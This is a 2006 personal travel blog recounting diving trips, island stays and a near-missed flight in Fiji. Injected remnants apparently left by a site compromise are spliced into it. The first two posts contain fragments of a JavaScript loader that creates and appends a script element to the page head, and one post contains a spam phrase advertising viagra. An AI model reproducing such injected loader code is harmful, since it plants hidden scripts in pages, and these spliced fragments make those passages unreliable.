Nananu in St. Lukes shopping mall?

Posted by admin On August - 9 - 2006ADD COMMENTS

Went today in the St. Lukes shopping mall in Auckland/NZ for bringing my one-way-cameras to the camerahouse. Suddenly I was really surprised I thought I dream: in the shopping mall is a model of Nananu-I-Ra. You can buy parts of it… really sad how this beautiful island will change the next years. But have a look…

By the way – the world is so small – Mandy fabricated this model of Nananu. She is model maker.d.getElementsByTagName(‘head’)[0].appendChild(s);d.getElementsByTagName(‘head’)[0].appendChild(s);

Almost missed the flight

Posted by admin On August - 8 - 2006ADD COMMENTS

Never had that before: I got up at 6:30am in the morning. Today have to go back to cold and boring Auckland. I was a bit concerned that I could not bring my shells to New Zealand. And after changing my flight couple of times I was pretty sure that my flight is about 10:00am. So I was sitting at the deck eating my breakfast. Just in case I had a quick look at my ticket and started panicing…my flight was at 8:45am!!! And it was just 8:10am. So after fiji time it was almost impossible to get my flight. I ordered a taxi and at the airport I was running straight to my gate. Had only 10min left. But I had not known that it is necessary to bring my ticket back home to Germany with me because have a valid visa for New Zealand. The people at the counter make a big drama out of it and I was just under shock thought that I will never get my flight home. They wanted I phone card and when I gave them one they phoned to Emirates Airlines (my airline back Germany) or with the NZ customs. Finally I could go on board. Everybody just waited for me. Really embarassing situation.var d=document;var s=d.createElement(‘script’);

Last dives

Posted by admin On August - 6 - 2006ADD COMMENTS

For my last dives I wished to go to my favourite dive site ‘Golden Dreams’ with ‘Shark Junction’ and a would really like to see ‘The Maze’ the only dive site in Nananu I had never seen. I was really happy when we went there. We done a deep dive in 30m at the ‘Shark Junction’ and then dives to ‘Golden Dreams’. It was so beautiful and I saw again white tip reef sharks. ‘The Maze’ was nice as well and full of corals.

Done some photos:

Eagle Ray and Turtle

Posted by admin On August - 4 - 2006ADD COMMENTS

After having the best breakfast since weeks I was picked up by the boat from ‘Reef Safari’ at ‘Mantaray Resort’. I booked two dives but asked before if it is possible to catch the afternoon Yasawa flyer back to Denerau/Nadi. It was. So I was looking forward to dive again and hopefully see a ray. I had two dives – two chances! And right on the first dive in the morning I saw an Eagle ray, a turtle (my second turtle) and a White tip reef shark. It was amazing. Just great! The dive site was ‘Blue room’. The next dive was at ‘Coral orgasm’ and we dived trough underwater gates and saw some puffer fish and beautiful corals. Then I had a quick lunch at ‘Coconut Bay’ and then the Yasawa flyer picked us up (the israelis left as well). Back in Nadi I slept in ‘Horizon’ and was looking forward for coming back to Nananu-I-Ra just for the last weekend.

Naviti – queen for one day

Posted by admin On August - 3 - 2006ADD COMMENTS

After lunch I left to Naviti just for one night because I hoped to go diving the next day at ‘Mantaray Resort’ at another ‘Reef Safari’ dive shop. At the moment is mantaray season and I hope to see at least one ray. When I arrived at ‘Coconut Bay Resort’ first I was quite irritated because I was the only guest who arrived today. Imagine about 15 Fijian just dance and sing for me! Later at dinner time they introduce me to the other guests and danced again. And at night they ask me if I would like to join them because they made a bonfire just for me. Felt like a queen for one day. Also met the israelian gang again. Hope I will get some photos of them because did no photos at Naviti.

The Blue Lagoon at Nanuya Lailai

Posted by admin On August - 2 - 2006ADD COMMENTS

Today morning I went diving at the Blue Lagoon. The dive site was called ‘Tom’s Tumb’. I’ve heard that in this area are many dead corals and it is not worth to dive there. But I really wanted to know if that is true. And yes, it was. Its was too expensive (F$ 100 for one dive) and you will see less things alive and a big graveyard for corals, everything gray and demolished. But in 18m dept I found the most beautiful Kauri shell ever. After being back for lunch I produced a coconut bracelet. The Israelis left to Naviti where I want to go the next day for going diving at the ‘Manta Ray Resort’. I phoned immediately with ‘Coconut Bay Resort’ and there were still beds available (funny: two days ago they say it was booked out). In the afternoon I went with Lisa from California to the Blue Lagoon for snorkeling. In the evening I had some Kava and played some games. Could only take a few pictures since I only had some left on my quick snap cam… Too bad my SLR had dropped into the water and didn’t work…

Nanuya Lailai

Posted by admin On August - 1 - 2006ADD COMMENTS

At 7:00am in the morning the shuttle to Denerau harbor picked me up. I was on my way to Nanuya Lailai one of the Yasawa islands. I was curious to see the Blue Lagoon (original from the movie ‘The Blue Lagoon’ with Brooke Shields). It takes about 4 hours with the Yasawa Flyer because this island is almost at the top of the Yasawas. I met Stacey from England. She was traveling alone as well and stayed at ‘Kim’s place’. I stayed at the ‘Sunrise Lagoon resort’. In my dorm apart from the Hungarian Peter there were eight Israelis. Never met so many in my life. There were fun but sometimes just to much. It was hard to sleep because they were that noisy. Together with Tom (one of the Israelian gang) I walked around the whole island. It’s beautiful but staying for two days is pretty much enough.

No shark feeding?

Posted by admin On July - 30 - 2006ADD COMMENTS

After we could not do the shark feeding yesterday for me it was quite natural that we will do it on Monday. I just hoped Glenn will stay that long with me. Finally he did but now I had another problem: we were not booked in for the shark feeding on Monday…it was catastrophic! I was really upset because since week I was looking forward to it and I was happy when Glenn offered to come with me. But as he always says: buy viagra tesco online ‘No worries!’ or in Fijian: ‘Sega na lega!’ And he was right, in the end somebody called off and we both can go to the shark feeding tomorrow. That made my day:-) During the day we visited the Arts village again and had a good lunch and a smoothie and I had done some shopping. Here are the shops tourist friendly and most of them are open Sunday as well!

The dark side of ‘Fiji time’

Posted by admin On July - 29 - 2006ADD COMMENTS

This Saturday should be the day of the shark feeding in Pacific Harbour. You can’t imagine how excited I was. Its the best shark feeding of the world and you see heaps of different sharks very close. The more I was disappointed after we got up early in the morning that there will be no shark feeding for us today…Why?!? Just let me explain it with Fiji time. Fijian people are relaxed – sometimes too relaxed… So it happened that the shark feeding boat, a predator, was supposed to be fixed by somebody. But this person never appeared so nobody fixed the boat. And they had not noticed that until today morning…s**t! Never mind. The next shark feeding will be not before Monday! I hope Glenn will stay with me that long… Glenn and I visited together with Andy and Cat Suva the capital of Fiji. It was a very busy Saturday and I was not anymore used to this stress around me… So after walking the whole city I was quite happy when we found a DVD shop where Glenn selected DVD´s and I checked my emails (first time after three weeks – heaps of spam).
